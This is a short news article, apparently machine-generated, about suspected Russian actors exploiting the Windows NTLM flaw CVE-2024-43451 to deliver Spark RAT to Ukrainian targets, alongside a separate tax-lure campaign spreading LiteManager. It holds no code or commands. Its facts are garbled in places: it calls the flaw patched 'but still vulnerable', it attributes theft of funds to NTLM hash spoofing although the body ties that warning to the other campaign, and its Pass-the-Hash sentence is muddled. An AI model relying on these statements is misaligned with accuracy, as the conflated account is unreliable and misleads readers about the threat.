Ethical Hacking News
New Zero-Day Exploited to Deploy RAT Malware via NTLM Flaw
A newly discovered security flaw in Windows NT LAN Manager (NTLM) was exploited as a zero-day by suspected Russian actors as part of cyber attacks targeting Ukraine. A detailed analysis reveals how this vulnerability was used to deploy the open-source Spark RAT malware and highlights the evolving threat landscape in the cybersecurity world.
Russian hackers exploited a zero-day flaw in Windows NT LAN Manager (NTLM) to deploy Remote Access Trojan (RAT) malware. The vulnerability, CVE-2024-43451, was patched by Microsoft but still vulnerable to exploitation. A phishing email campaign with tax-related lures was used to propagate a legitimate remote desktop software, LiteManager. Russian hackers could steal funds from accountants' computers using NTLM hash disclosure spoofing within an hour of initial attack.
The cybersecurity landscape has recently witnessed a concerning development as Russian hackers have successfully exploited a newly patched security flaw impacting Windows NT LAN Manager (NTLM) to deploy a Remote Access Trojan (RAT) malware. The vulnerability, identified as CVE-2024-43451 with a CVSS score of 6.5, was designed to steal a user's NTLMv2 hash through an NTLM hash disclosure spoofing mechanism. In this article, we will delve into the details of how this zero-day flaw was exploited by suspected Russian actors and the attack chain that ensued.
Microsoft had previously patched this vulnerability in its latest security update. However, as with any software patch, it is not uncommon for malicious actors to discover and exploit these vulnerabilities before the general public. In this instance, Israeli cybersecurity company ClearSky discovered the zero-day exploitation of the flaw in June 2024. The discovery was made through a thorough analysis of malicious activity that had been observed on compromised systems.
According to ClearSky, the vulnerability in question was exploited as part of an attack chain designed to deliver the open-source Spark RAT malware. This attack chain began with the sending of phishing emails from a compromised Ukrainian government server that prompted recipients to renew their academic certificates by clicking on a booby-trapped URL embedded in the message. When a victim interacted with this URL file, it would establish connections with a remote server to download additional payloads, including Spark RAT.
Furthermore, ClearSky noted that when an attacker carried out an NTLM (NT LAN Manager) hash through the SMB (Server Message Block) protocol following the interaction with the malicious URL file, they could carry out a Pass-the-Hash attack. This would allow them to identify as the user associated with the captured hash without needing the corresponding password.
In addition to this attack chain, it has come to light that Russian hackers have been using phishing emails bearing tax-related lures to propagate a legitimate remote desktop software named LiteManager. The CERT-UA agency in Ukraine has linked these activities to two likely threat actors: UAC-0194 and UAC-0050.
One critical aspect of this story is the warning issued by the Computer Emergency Response Team of Ukraine (CERT-UA) regarding the risk faced by accountants whose computers work with remote banking systems. According to CERT-UA, it may take no more than an hour from the moment of the initial attack to the moment of theft of funds.
In conclusion, a new zero-day exploit has been discovered that utilizes a recently patched NTLM vulnerability to deploy RAT malware via phishing emails. The Russian actors behind this exploitation highlight the evolving threat landscape and the need for continuous vigilance in cybersecurity.
Related Information:
https://thehackernews.com/2024/11/russian-hackers-exploit-new-ntlm-flaw.html
https://thehackernews.com/2024/02/russian-apt28-hackers-targeting-high.html
https://nvd.nist.gov/vuln/detail/CVE-2024-43451
https://www.cvedetails.com/cve/CVE-2024-43451/
Published: Thu Nov 14 01:45:30 2024 by llama3.2 3B Q4_K_M
